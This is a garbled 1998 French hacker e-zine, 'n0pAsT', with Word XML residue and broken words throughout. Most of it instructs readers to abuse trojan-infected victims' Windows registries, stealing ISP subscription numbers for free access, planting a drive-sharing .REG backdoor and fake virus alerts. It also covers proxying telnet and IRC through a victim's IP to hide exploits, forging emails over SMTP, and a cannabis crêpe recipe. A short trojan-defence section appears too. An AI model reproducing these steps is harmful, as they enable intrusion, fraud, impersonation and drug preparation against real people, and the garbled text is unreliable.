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                  _                               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_/                ____// _       ____   ___________  __________    ____                \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 __   ___/ ___\ | |__   / __ \ /____   ___ \/ ___   ___\_ / __ \ _  __  __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|  \ | || | //|||  __\ | |  | |/ __/| |   |/\|   | |/ __/| |  ||| |/  |/  |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|   \| || |// ||| |  \|| |##| |\__ \| |          | || _| | |##|||   |   | |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| |\___|| |/__||| |__/||_|  |_|/___/|_|          |_||___\|_|  |\|__/|__/| |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        |/       \____/ |  __/                                        \/         \|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|                //      |_|             _____________                                    |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|_               \|                  .,:;&gt;  mAdE By  &lt;;:,.                               _||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\                                     /             \                                 /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   *MiSt0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/   *fuLg0r       \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-�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>桢��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/   *ToBoZo         \������-�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>桢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/   *Backflip         \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   *Lord Nanard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   *Natural Killer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8&lt;----+-----8&lt;---------8&lt;---------8&lt;--+-------8&lt;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____________.....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_________________________________________________________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    /   TabLe des mAti�res :                            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$T E-z���\  |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-=v0L 1=-  [  |     [1]n0pAsT....f0ndAti0n.....!)                  +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\ &gt;JuiLLet 98 /  |     [2]Disclaimer                                  ++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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>|     [3]Exploits sur base de ReGistre           ++nk &amp;  Na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[4]iNF0NiE BEsT 0f hACk                        ++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[5]Le mail sous TeLneT (An0nYm0uS)             Na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[6]Sp00fing                                    Na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[7]Etre ou ne plus �tre....                   Back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[8]Les recettes de tonton Mist0                 M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[9]Introduction a l'�muLation                   fu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8&lt;------+--------------8&lt;---------------------8&lt;---------------------8&lt;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        ______________________________________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^�*;:,.&gt; f 0 N D A T i 0 N  d E  n 0 p A s T &lt;.,:;*�^`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/���������������������������������������\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quoi n0pAsT ? ....pff con cette question ....bah paskon est tous de pass� diff�rents et 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essayer de s'unir ..., Paske le fUtuR est devant nous :), pasken haCk comme en autre c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evolue ...et on dois chaque jour utiliser de nouvelles armes, de nouvelles techni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t pis ....ptet kon a l'ambition de devenir le fUtuR du H@Ck fRanCopHoNe......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 creation du groupe s'est faite sur un coup de t�te de certains des membres actuels.....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 le bol des groupes ki se prennent pour des boss alors ki valent pas grand chose ....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etend en rien, on ne vous dit pa kon est le meilleur ...mais tout ce kon sais C kon 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AVANCER LE CHMILBLIK !!!! alors.....n0pAsT RuLezzzZZZZZZZZ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t E-ziNe (ke vous attendiez tous !) est le premier volume d'une LooooOOOOOOngue ser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abordera des sujet tels ke ...la teck, le hack, phreak, l'emulation, recett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sines...:)~ de l'uNdErGr0uNd....de la vie, de mon chat, ma copine, mon ordi,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mes potes, le clebard de ma voisine, les morbaks des DWF....(#pRiVaTe j0kE#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lors bOnne Lecture ....et rendez vous dans le prochain numero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ref, c'est un journal qui est fait par l'Underground POUR l'underg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++neur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merci neur...(c mon idR�l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        ______________________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`^�*;:,.&gt; � � $ � � � � M � � &lt;.,:;*�^`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/�����������������������\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h .....(chu �mu..)...b0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es informations contenue dans ces textes peuvent �tres interdites dans certains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..pas d'chance !) dans le cas ou vous ne savez rien de la l�gislation de votre pays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 ...on peut pas vous aider paske nous non plus ;)...sinon, renseignez vous afin de savoi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i ou *** (decryptez l'pass ....mouarf :) vous avez le droit de posseder et de lir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Ces informations sont donn�es a titres PUREMENT EDUCATIF !!! (ok les momes ?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uteurs, producteurs ne peuvent en aucun cas �tre rendu responsable de l'applicatio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 ces ecr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pis si ca vous plait pas ALLEZ LIRE AUTRE CHOSE !!! (on vous lora assez dit ...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        _______________________________________________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^�*;:,.&gt; EXPL0iTS SUR LE PiRATAGE DE BASE DE REGiSTRE &lt;.,:;*�^`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/������������������������������������������������\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n ! Salut les neuneu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, nan vous KC pas deja ..CT juste histoire de cette mettre dans le mov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 cette article comme il est indiquer au dessus est cens� vous expliker un peut le prin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 piratage d'une base de registre (BDR) windows .....tfacon ....yen a kasiment ke sous wind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a j'entends deja les remarques a 2 balles du sty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 a quoi ca sert puiskon y a jamais acces ?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s si vous y avez acces .....ne serait ce qu'avec le control de socke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un exemple parmis d'autres !! Vous dites pas ke ya ke ce moyen pour y acc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is si mais si reflechissez un peu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 ....on va voir le cas du controle de sockets dans un premier lieux (puiske vous vou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z jamais) et on verra le cas general au travers, vous me suivez ? nan ? c pas gr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ais suivre...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ce qui est du control, je vous passerais nanard ...y vous a fait des BO dessin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aites gaffe....il est po du genre a leziner ...il attaque direct...). Mais avant tou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e intro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,:;&gt; INTRO &lt;;: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D'abord, pk il ya une base de registre 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incipe est simp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on ajoute de composants a un system, plus il deviens difficile de s'occupper du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entretenir....et plus il devient dur d'ajouter correctements de nouveaux elements. B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z l'immensit� du nombre de peripheriques ke l' OS doit �tre en mesure de reconnai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onc par conscequent l'immensit� du nombre de pilote qu'il est senser pouvoir charg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oublier qu'il dois faire communiquer les applications avec ces peripheriques et que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communiques egalement entre elles !!! (les API ...).....vous realisez maint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�le de la Base de Registre ? (si Non ...remontez de 3 lignes LOL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ur l'historique, sachez juste qu'a l'origine cette tache etait remplie par le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l'extention est .ini , ces fichiers sont encore present dans windows....car les programm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 pris l'habitude de gerer leurs applications grace a ces fichiers (malgres les reque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$oft a ce sujet....). Mais en theorie, la base de registre est sens�e pouvoir g�rer a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 tous les ev�nements du system d'exploitation ...et C en cela qu'elle est interress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qu'elle en gere deja une enorme partie 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n, assez de blabla !!! Je vous passe Nanard pour la pratique !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++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&gt; Je prend la main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...bon...lorsque vous cliquer sur l'option B.D.du control , vous voyez apparaitre une fenetre avec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inconnues selon votre degr� d'utilisateur Windows. Vous me direz " a quoi ca ser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est ce que j'en ai a foutre puisque je peux aller sur le HD du gars?" Ok vous avez raison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oubliez que la base de registre renferme des secrets que le disque dur ne peux revel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e: le nom de famille du gars. Cela peut aussi vous eviter les longs temps d'acces du di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. Et vous pouvez vous amusez a personnaliser l'environnement de votre vic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.,:;Exemple;:,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vous etes connect�s a votre victime, si vous voulez vous connecter a internet gratuitement, vous prenez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nie.ini qui se trouve dans c:\windows\. Ok? Mais le temps d'afficher le repertoire comp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long et inutile puisqu'il vous faut seulement une information: le n� abonnement de la 1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ne du fichier. Avec la base de registre, il y 2 lignes a taper et vous avez immedi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n� abonn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l� complete ou se trouve ce n� est: HKEY_USERS\.Default\RemoteAccess\Profile\Info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cher HKEY_USERS (voir schema ci-dess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lacer la suite de la cl� dans l'emplacement "Cl�" : .Default\RemoteAccess\Profile\Inf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aper dans la case "Nom" :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resser le bouton "L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Dans la fenetre en dessous doit s'afficher le n� de connexion (voir sche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.,:;SCHEMA;:,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��Cl� racine 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( )HKEY_CLASSES_ROOT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   (x) HKEY_USERS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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( )HKEY_CURRENT_USER</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) HKEY_CURRENT_CONFI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( )HKEY_LOCAL_MACHINE</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) HKEY_DYN_DATA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�� Style (et non, pas d'hexa): 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(x) Style Chaine</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) Style Entier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�:  |.Default\RemoteAccess\Profile\Infonie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m:  |User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�����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eur: |</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">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ire</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>E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Remote &gt; VALEUR: inf1/199717831785114@infonie.fr   |  &lt;== excellent, n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utres Util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 que vous avez compris comment ca fonctionnait, je vais vous donner d'autres c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our avoir le numero d'abonnement son wanadoo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chez: HKEY_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mettez dans "Cl�" : .Default\RemoteAccess\Profile\wan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r dans "Nom":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liquer sur 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Il vous reste plus qu'a trouver le password :o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our avoir le numero d'abonnement son infoni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bah alors nanard ....on oublie infoni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ochez la Cl� racine : HKEY_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rentrez la Cl� : .Default\RemoteAccess\Profile\inf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 taper "Nom":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voila, le travail est fait !!! Pour vous connecter, il ne vous reste plus qu'a cre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connection avec comme Nom la chaine de caractere ke vous aurez trouver dans la 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:    inf1/[numero d'abonnement]@infoni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information, le numero d'abonnement commence toujours par l'ann�e ou celui ci a deb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Astuce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 vous poss�dez l' IP de la victime, mais pas son Host ....et que vous voulez determiner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victime est sous infonie, sachez que le rezo d'infonie comporte une adresse IP de class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onc toutes les IP des infoniens commencent par le meme enchainement de 6 chiffres qui e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5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IP des infoniens sont donc du type : 195.242.XXX.X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bon je vous repasse nanard ....@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++nk...|aLiE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hanger la license windaube de sa victim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ouvez connaitre &amp; changer le NOM de FAMILLE, l'Organisation, et le n� de licence O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Windows de votre vic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cher: HKEY_LOCAL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z dans "Cl�": SOFTWARE\Microsoft\Windows\Current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z dans "Nom": Registered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liquez sur Lire pour connaitre le VRAI nom de la victi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mettez dans "Valeur" le nom que vous voulez mettre a la place (le votre par exe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) Un message suivant doit apparait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mote &gt; VALEUR ECRITE AVEC SU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res possibilit�s de la phas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z dans "Nom": RegisteredOrganization  &lt;== Organisation de la vi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z dans "Nom": ProductId</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     &lt;== n� de licence OEM d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z dans "Nom": Version</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">     &lt;== Version de l'O.S. (exple: Windows) mettez: Windob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hanger le nom de l'ordinateur de sa victim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eut etre amusant de changer ce nom pour mettre votre pseudo a la place :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cher: HKEY_LOCAL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z dans "Cl�": System\CurrentControlSet\control\ComputerName\Comput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z dans "Nom": Comput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liquez sur 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mettez dans "Valeur" le nom que vous voulez mettre a l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�sactiver le password valide du Sockets23 de la victim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supprimant ce password, la victime n'aura plus l'acces � son cont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cher: HKEY_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r dans "Cl�": .Default\Software\Soqu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r dans "Nom": Pass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liquer sur Lire. Normalement doit apparaitre: REMOTE &gt; VALEUR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aper dans "Valeur":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hanger le nom reseau de sa victim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cher: HKEY_LOCAL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r dans "Cl�": Network\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r dans "Nom":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liquer sur Lire pour voir son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aper dans "Valeur" un nom au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vous faites NBTSTAT -A IP_VICTIME, vous voyez apparaitre un nom. Vous pouvez le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informations sont visibles a partir du panneau de configuration, dans les parametres RE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 dans "IDENTIFICATION". Mais vous pouvez aussi changez celles de votre vic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� complete: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNE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cher: HKEY_LOCAL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r dans "Cl�": System\CurrentControlSet\Services\VxD\VNE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a) taper dans "Nom": Comput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b)taper dans "Nom":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c)taper dans "Nom":Work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a) Cliquer sur Lire pour voir le nom du pc de la vi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b) Cliquer sur Lire pour voir le commentaire a propos du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c) Cliquer sur Lire pour connaitre le groupe auquel appartient la vi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a) taper dans "Valeur" un autre nom... (exple: Mic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b) taper dans "Valeur" un commentaire a votre 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c) taper dans "Valeur" un autre groupe... (exple: Disney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re victime n'a pas activer le PARTAGE DE FICHIERS ET IMPRIMANTE ?? Faites le vous me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cher: HKEY_LOCAL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r dans "Cl�": System\CurrentControlSet\Services\VxD\VNE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a) taper dans "Nom": Fil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b) taper dans "Nom": Print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a) taper dans "Valeur"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b) taper dans "Valeur"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Partager le disque dur de votre victim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 d'abord, il faut que l'etape precedente soit effectu�e ou que la victime ai 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repertoires partag�s. Mais peut-etre qu'il ne vous interesse pas... Ok, Allons part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isque dur totalement :o) (ca va etre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� complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\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cher: HKEY_LOCAL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r dans "Cl�": SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\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IMPORTANT: COCHER "STYLE ENTI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taper dans "Nom"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Parm2e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 Parm1e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aper dans "valeu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2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laisser le champs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)laisser le champs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COCHER: "STYLE CH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) taper dans "Nom"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taper dans "valeu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)C:\  </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  &lt;==== ca signifie que C:\ sera parta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mon disque dur    &lt;==== le commen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th�orie cette technique devrait marcher. Mais je ne l'ai pas encore test�. Faites moi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s comment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egalement cr�er un fichier chez vous, puis l'uploader sur le disque de la vi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 l'executer. Cr�er le fichier PARTAGE.REG faites un clique droit dessus puis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&gt; Contenu du fichier PARATAGE.REG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8&lt;------------------Cut-Here------------------8&lt;--------------------------------8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DI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KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C]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gs"=dword:0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"=dword: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"="C:\\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m2enc"=h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m1enc"=h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ark"="mon disque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8&lt;------------------Cut-Here------------------8&lt;--------------------------------8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aleur "C:\\" est normal. laisser comme tel. Cette methode est beaucoup plus simpl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plus fiable. je vous conseille de cr�er ce fichier a l'avance chez vous pour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ines visites chez vos victimes. Ceci est une "backd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r�er un message d'alerte au demarrage de windaub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eut etre amusant de faire PEUR a sa victime en cr�ant une fenetre qui apparaitra a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age de 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� complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Win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cher: HKEY_LOCAL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r dans "Cl�": SOFTWARE\Microsoft\Windows\CurrentVersion\Win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r dans "Nom": LegalNotice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aper dans "Valeur" le nom de la fenetre qui sera cr�� a chaque d�marrage d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) taper dans "Nom": LegalNotice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taper dans "valeur" le message contenu dans la fenetre qui sera cr�� a chaque d�marrage d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Faite rebooter votre victime pour que les changements prennent ef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=&gt; Exemple de fenetre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ab/>
        <w:t xml:space="preserve">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K : Vous pourrez trouver un exemple de ce type en executant le fichier WINLOGON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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   Virus detect�         | &lt;---* LegalNotice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  Windows vient de detec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| un virus. Veuiller eteindre | &lt;---* LegalNotice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    Votre ordinateur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Modifier le nom par defaut de l'ouverture des session window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que Windows red�marre, il vous demande votre pseudo et votre mot de pass d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g�n�ral, Windows conserve le dernier login de votre derniere session. (c'est tout le te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eme quoi). Cependant, vous pouvez le changer en mettant le votre. La victime sera tres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vous le garanti :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� complete: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win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cher: HKEY_LOCAL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r dans "Cl�": SOFTWARE\Microsoft\Windows\CurrentVersion\Win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r dans "Nom": Default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liquer sur Lire pour voir son login d'ouverture de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aper dans "Valeur" un nom au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Modifier le UIN de sa victime &lt;          -=&gt;n�cessite la connaissance de celui c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111: UIN de la vic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 complete: HKEY_CURRENT_USERS\Software\Mirabilis\ICQ\Owners\1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cher: HKEY_CURRENT_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r dans "Cl�": Software\Mirabilis\ICQ\Owners\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aper dans "Nom"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liquer sur "Lire" pour voir le pseudo utilis� dans ICQ de la vi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aper dans "Valeur" un nom au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r les pr�f�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cher: HKEY_CURRENT_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aper dans "Cl�": Software\Mirabilis\ICQ\Owners\1111111\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a) taper dans "Nom": Random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b) taper dans "Nom":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a) Cliquer sur "Lire" pour voir le message libre mis dans ses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b) Cliquer sur "Lire" pour voir son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a) taper dans "Valeur" un message plus appropri� a vos d�sirs :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b) taper dans "Valeur" un nom plus marrant ... :o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liquer sur "Ecri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i la victime est sous NT comment on fait ?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���������������\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la victime est sous Windows NT, les cl�s sont les memes... il faut seulement changer la c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e mot Windows est dedand. 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� sous Windows95/98: SOFTWARE\Microsoft\Windows\CurrentVersion\Win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� Sous Windows NT  : SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win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....si vous avez a peut pret suivit nanard ...vous avez du comprendre que la ba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e se presente sous la forme d'une gigantesque arborescence compos�e de Cl� rac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��Cl� racine ������������������������������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( )HKEY_CLASSES_ROOT</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) HKEY_USERS</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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( )HKEY_CURRENT_USER</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) HKEY_CURRENT_CONFI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( )HKEY_LOCAL_MACHINE</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   ( ) HKEY_DYN_DATA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cunes de ces cl�s racines etant compos�es de sous cl�.....contenant des cha�nes....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nent elles memes des donn�es de valeurs.....le boxon vous allez me dire ...@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 NAN !!! C comme ca que C le mieux organiser .......enfin ....C toujours du Kr0$0fT.....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++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        ______________________________________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^�*;:,.&gt; i N f 0 N i E  B e S T  0f  h A C k &lt;.,:;*�^`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/���������������������������������������\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iNf0NiE : cArAcTeRiStiQuE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\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ns doute le pRovider le plus fAcile a pirater au m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ns doute le pRovider le plus cher du m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....sAns doute le pRovider le plus rapide d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....sAns doute le pRovider possedant les oPerateur les plus kEwL du m0nde ...f0pani�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uh.......sAns doute v0tre prochain pRovider....hihi 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hAcK d'iNf0NiE, hisToRiK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\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 voila, deja je previens les c.... ki ont des prejug�s ....je V pas vous refiler l'ast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estrale du pass: OMNAMAHA, paske d'abord G autre chose a foutre ke de raconter les hack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(le prenez pas mal, je deconne...) mais aussi paske cet exploit ne marche plu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 astuce est maintenant je pense assez connue ( G filer le truc a plein de monde ) a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llez pas me raconter ke C vous ki l'avez trouver ...!�) Bon assez de blabla, je pas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historiqu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son temp (a l'epoque ou infonie n'etait pas tres connus), je possedait un abonnement inf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je me debrouillait pour choper des abonnement de 6 mois ....Lorsqu'un jour, infonie sort les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bonnement ! Vous savez, ces CD a 2 balles kon vous file dans tous les magazines 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pris donc un kit d'abonnement ke j'avais degoter chai+ou et je lance L'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et la surpris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premier lancement d'infonie, une connection est lanc�e vers un numero en 01 afin d'enregis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arametres sur l'utilisateur (ou est ton fLouZe....ou taBite ...n0m, fo numero de tel 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et la le declic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minimise la fenetre de merde d'infonie et je lance mon bUtineur ...configuration ....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x du proxy .....: (tps court de reflexion) proxy.infonie.fr ....port 8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 MARCHE !!! ( normal c de mouA hihi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somme le server ki faisait office de server d'enregistrement des nouveau abonn�s etait e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erveur de connection des abonn�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es une verification : Les numeros des points de connection sont dans le fichi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        ________________________________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^�*;:,.&gt;  s p 0 0 f e r  s u r  I R C  &lt;.,:;*�^`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/���������������������������������\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,:;&gt; INTRO &lt;;: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est bien marrant de se balader sur les HD des mecs avec le socket; mais on s'en lasse v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xiste des outils que personne utilise et qui pourtant sont tres interessants. En eff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ocket int�gre une partie "Client" qui permet d'utiliser l'IP de la victime po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s utilisant le TCP. l'exemple le plus explicite est l'I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,:;&gt; eXeMpLes &lt;;:,.               _/hiGh gReTz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              </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>[spEciAL tHan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                                      �&gt;t0  JC'ziC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N pAssAnT pAr cHeZ JC'ziC &lt;                       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\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 n'a jamais voulu avoir l'IP de quelqu'un d'autre sur IRC et donc de faire ce qui lui plait en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nit�? C'est facile avec le control de J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u te connectes comme d'hab sur la vic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u cliques sur "cli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u ecris l'hote sur laquelle tu veux te connecter en spoofant. ex: uk.under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n dessous, tu �cris le port du serveur. ex: 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u appuies sur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u lances ton prog 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u tapes dans la fenetre status: /server 127.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Ca y'est, t'es connect� avec l'IP de ta vic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a un exemple de ce qui doit s'afficher dans la fenetre CLIENT du socket2.3 un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etes connect�s sur IRC via une IP hack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g-in connect�, connection du client distan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&lt; OK client ferm�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&lt; OK : scan de l'host/IP maintenant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&lt; OK (scan ok) = connection...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&lt; OK : vous �tes connect� !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&lt; OK (envoie de sockets)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:1739703711-&lt;&lt; OK (envoie de sockets)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&lt; OK (envoie de sockets)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ports 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:London.UK.eu.Undernet.org 372 MYSTED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general IRC help: /join #help or email help@undernet.org:London.UK.eu.Undernet.org 372 MYSTED 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questions regarding THIS server, email uk-opers@nildram.co.uk:London.UK.eu.Undernet.org 3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D :- :London.UK.eu.Undernet.org 372 MYSTED :-  GETTING STARTED:London.UK.eu.Undernet.org 3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D :-  Good channels to check out: #friendly, #chat, #newbies, #userguide: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.UK.eu.Undernet.org 372 MYSTED :- :London.UK.eu.Undernet.org 372 MYSTED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WORD FROM OUR SPONSORS...:London.UK.eu.Undernet.org 372 MYSTED :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ver is provided by Nildram Ltd, Britain's best ISP for IRC:London.UK.eu.Undernet.org 372 MY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 and Quake! http://www.nildram.net/:London.UK.eu.Undernet.org 376 MYSTED :End of /MOTD command.-&lt;&lt; OK (envoie de sockets)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ndon.UK.eu.Undernet.org 303 MYSTED :-&lt;&lt; OK (envoie de sockets)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:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr JOIN :#sIRC:London.UK.eu.Undernet.org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TED #sIRC :Bient�t, une m�ga page IR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 construction-&gt;Http://www.QuebecIRC.com (Http://www.scriptfr.com):London.UK.eu.Undernet.org 333 MY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IRC W 900207356:London.UK.eu.Undernet.org 353 MYSTED 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IRC :MYSTED oneil- FardocheX Lilith OrAnGe michael-2 DaRkMaX +W|ndEartH @W @Spiroub0t }{Ead :London.UK.eu.Undernet.org 366 MY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RC :End of /NAMES list.:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr JOIN :#sIRC-&lt;&lt; OK (envoie de sockets)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London.UK.eu.Undernet.org 324 MYSTED #sIRC +stnl 69:London.UK.eu.Undernet.org 329 MY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RC 896447441:oneil-!the-best@ras4-11.bbsi.net PART #sIRC-&lt;&lt; OK (envoie de sockets)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:MYSTED!~daelin@bjn8-240.abo.wanadoo.fr NICK :Nanard-&lt;&lt; OK (envoie de sockets)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:Nanard!~daelin@bjn8-240.abo.wanadoo.fr PART #sIRC-&lt;&lt; OK (envoie de sockets) &gt;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la c'est tout pour cette fois. Les possibilit�s sont infinies! Tu peux spoofer sur n'importe quelle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 dois savoir seulement que la liaison d�pendera de la ligne de ta victime car elle est l'interm�dia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i &lt;-----&gt; Victime &lt;-----&gt;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sp00feR sUr uNe sTaTi0n UNIX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���\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u ecris l'ip de la station unix. ex: 193.252.20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n dessous, tu �cris le port du serveur: 23                                ApprEnd a c0m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u appuies sur OK.                                                               nAnAr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u lances telnet                                                                       +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u appuies sur "connecter" / "systeme distant" et t'ecris dans l'hote : 127.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Ca y'est, t'es connect� avec l'IP de ta vic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tu peux maintenant executer tes exploits sans qu'on puisse te retrouver. :o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enant a vous de faire marcher votre imagination et de trouver de nouvelles util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vous conseille de faire des tests chez vous avant (en r�seau par exemple, c'est prat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es suggestions et des id�es, envoyez nous un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                                   LorD Na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        ________________________________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^�*;:,.&gt;  mAiL pAr TeLnEt ...An0nYm0uS &lt;.,:;*�^`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/���������������������������������\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.,:;&gt; INTRO &lt;;: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mec te fais chier et ta son e-mail. Tu veux lui faire une blague en te faisant passe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'un d'aut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ab/>
        <w:t xml:space="preserve">     .,:;&gt; eXeMpLe &lt;;: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 pote se crois le maitre des Hackers car il utilise le socket 2.3 . Tu veux lui foutre les bou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 de plus simple: tu lui envoies un mail de la part du webmaster de son provider :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u lances TELNET. Pour les Neuneus: DEMARRER/ EXECUTER /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u appuies sur "connecter" / "systeme dist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ans "hote" tu ecris le server SMTP. ex: smtp.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nsuite le port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ecris dans la fenet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LO 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l from:webmaster@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cpt to:victime@wanadoo.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nsi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us avons d�tecter des activit�s illicites en provenance de votre comp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rtains clients se sont plaints d'avoir �t� pirat� et veulent en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une action judiciaire sur votre personne. Cependant nous voudriont �vit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urs de la police. C'est pourquoi, je vous invite a arreter toutes intr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tantes. Votre compte sera suspendu pendant un mois en guise d'avertis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toine Fortin,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a un exemple qui devrait redescendre sur terre plus d'un newbie :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trouverez un programmes BATCH qui automatise la t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uffit de l'�diter et de remplacer les entr�es mises pa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 du fichier: mai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        ______________________________________________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^�*;:,.&gt; �tre ou ne plus �tre, l� est la question... &lt;.,:;*�^`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/�����������������������������������������������\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nos jours, le NET est rempli de programmes de toute sortes qui visent � le d�trui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re Internet est rendu une Cyber-Poubelle� En passant par les Nukes, les Lands, les Bo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qu�aux fameux Trojan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sieurs personnes inconscientes du fait d�utiliser de tels programme peuvent caus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ages consid�rables � des personnes innocent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�est ce que nous appelons commun�ment les lamerz� C�est personnes d�truisent notre NET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savoir� J�ai donc d�cid� d��crire un article sur la protection contre les Trojans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es programmes de type chevaux de Troie les plus connus et les plus commu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gt; Sockets de Troie et tout ses d�riv�s (Sockets23, Sockets 2.X, etc.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�de un ordinateur infect� par un programme donnant la possibilit� de s�introduir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ordinateur de la victime� Possibilit� de rebooter, de faire afficher un texte a l��cran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imprimer un texte sur l�imprimante par d�faut, de modifier la Base de Registre et d�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�s au Disque locaux de l�ordinateur exploiter� Port d�acc�s : 5000 et 30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&gt; NetBus 1.53 et 1.6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chose que le Sockets de Troie� Port d�acc�s : 12345 et 12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&gt; Back Orific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 possibilit�s que le Sockets de Troie� Port d�acc�s par d�faut : 31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gt; Master Paradise et Hacker�s Paradi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chose qu�avec le Sockets de Troie sauf quelques fonctions diff�rentes� Port d�acc�s : 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f, plusieurs programmes de hack sont sur le marcher� Pour s�en d�fendre, quelque programmes existes� Voici ceux que je vous pr�f�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gt; BouffeTroy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petit programme cr�er par Aiki scan votre disque dure et �limine les taupes du Socke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ie, du Sockets23, de NetBus, de Back Orifice, de Hacker�s Paradise, de ICKiller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ieurs autre programmes de hack� Ou le trouver : http://www.mygale.org/~aikick/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�No Hac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&gt; Anti-Sockets23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oge le Virus du Sockets23� Pas trouvable sur le NET, z�avez qu�a demander a vos ami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&gt; SmartGuar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cr�er par moi-m�me qui prot�ge contre les attaques de programmes de hack comme c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� en haut� O� le trouver : http://www.mygale.org/~backfli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&gt; StReVeng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�ge contre les attaques du Sockets de Troie et reboot ou prend en contr�le l�ordinate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 qui tente de vous hacker sur le port 5000.. Pas possible de le trouver sur le NET, z�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�a demander a vos am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&gt; AntiViral Toolkit Pro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qui a les m�me possibilit� que McAfee mais trouve maintenant aussi le Virus du Sockets2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bah aLoRs BacK ....oN fAiT dEs z0ubLis ?!         ++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gt; Socket 23 Keep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ge contre les attaques du socket + possibilit� de desinfecter de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gt; Anti-Vir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'anti virus cr�� par JC a la suite des incidents ki ont U lieux en juin dernier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lip@in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n0past Und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        ________________________________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^�*;:,.&gt;   d R u G s  b Y  M i S t 0   &lt;.,:;*�^`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/���������������������������������\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(misto@bigfoo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le space yogourt, j'ai d�cid� de vous r�v�ler l'unique et v�ritable re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SPACE CR�PE gard�e jalousement, depuis des g�n�rations, par un p�tissier holland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recette originale est excellente lors des soir�es entre potes, anniversa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Ce qu'il vous faut r�uni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������\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 dl de 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0 grammes de farine tami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Oeuf (fr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 cuill�res a soupe d'h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 Shaker et une po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 grammes de r�sine de canna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La recette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\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z dans le shaker le 28 dl de lait, les 80 grammes de farine tamis�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euf (sans oublier d'enlever la coquille :) puis les 2 cuill�res � soupe d'hu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riter correctement vos 5 grammes de r�sine de cannabis dans le shaker. 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�ratif qu'il n'y est pas de boulettes. Ajoutez 2 pinc�s de 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z, secouez �nergiquement puis versez le contenue du shaker dans une grosse po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la cr�pe sera tr�s �paisse (c'est normal) donc pr�voyait une grosse po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es la cuire suffisamment en n'omettant pas de la retourner � mi-cui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D�gustation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\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recette est faite pour 3 perso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� votre cr�pe est pr�te d�moulez la dans une grande assiette et faites 3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ous faut manger votre cr�pe le plus rapidement apr�s son d�moulage et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gn� l� d'une bi�re blo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ffet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\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mont� se fera moins rapidement qu'avec un space yogourt mais les effet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de m�me euphorique (crise de rire et j'en passe..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ur�e approximative du trip est de 3 he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� bon Hack et bonne d�fonce apr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        ________________________________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^�*;:,.&gt;  iNtRoDuCti0n a L'�mULaTi0n   &lt;.,:;*�^`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/���������������������������������\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,:;&gt; INTRO &lt;;:,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hehehehee !!!!!!!!!! Enfin mon tour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n mon r�le est de vous parler un peu de l'�m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me direz "c'est quoi l'�mulation ?!" Alors bande de jeunes inconscients (bruit de scie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vais expliquer en gros ce que c'est ! Vous avez un PC non ? (Si surement, sinon vous ne s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en train de lire ce E-zines... :p ) Et vous aviez un ordinateur ou une conso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 vous diriez de rejouer a vos anciens jeux qui vous avez faits rev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bien c'est possible !!!!!!!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" me diriez vous ? Avec un �mulateur !!!!!!!!!!!!! Non pas possible !!!!!!!! Et si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ors vous pouvez pratiquement tout emuler a conditions de savoir le code source du micro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onsole a emu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'est ce que l'on peut trouver comme emulateur ??? Facile et difficile ! Il existe plusi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d'emulat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mulateur le plus connu est sans doute MAME qui emula toutes les bonnes vieilles bor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rcade comme pacman, galaxian et autres supers jeu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s il reste encore qq progres a faire :) Sinon il exite des emulateurs specifiqu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s jeux comme MGE qui nous fais revivre les bons moments passe avec la serie des gauntlet ! ! Vous savez ce jeu interminable o� l'on incarne un guerrier, elfe, magicien, valkyrie au choix ? Ah vous vous en souvenez :) Coo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n il reste aussi des emulateurs comme Callus dont la specialite est d'emuler les roms CPS1 ! Kesako ? Facile toutes les roms qui CAPCOM comme Final Fight, Strider, Rockman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en des choses se sont passes avant l'avenement du PC fasse au autres ordinateu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l'AMIGA et l'ATARI etaient les maitres du jeux et etaient bcp plus puissant qu'un PC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rouvait de tout ! Jeux, Demos, Utiliataires Dessin, Musiques (rappelons que l'amiga et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emier ordinateur a avoir une qualite de son extraordinaire ! Mais on peut aller pio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re plus loin, Comme l'APPLE II ! Ah quels koies passes avec Karateka ou Tetris...C'etai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 vieux tem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'est facile on trouve de tout !!!!!!!!!!!! Sauf un emulateur Saturn qui est en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developpement. Sinon vous pouvez dors et deja emule sur votre PC une playstation, voire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GEO avec NEORAGE ! Sinon vous pouvez trouvez des emulateurs pour les 16Bits de SEGA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 ainsi que leurs petites soeurs, les 8Bit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meme des emulateurs LINX (Paix a son ame...) et aussi les premieres consoles tel que l'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 et meme le Vectrex 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n pour ce premier num�ro de n0past, je vais vous parler de l'emulateur NEOGEO, c'est � d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AGE (NEO REAL ARCADE GAME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/ N \\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�����������������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FICHE TECHNIQU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NOM :        NEO R.A.G.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CREATEUR :       R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DERNIERE VERSION EN DATE : 0.2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TYPE EMULATEUR : ARCADE &amp; CONSO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EXISTENCE DE ROM : O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������������������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 1ere version de NEORAGE (0.0000001) est sorti il y a deja 6 mois et a grandi en 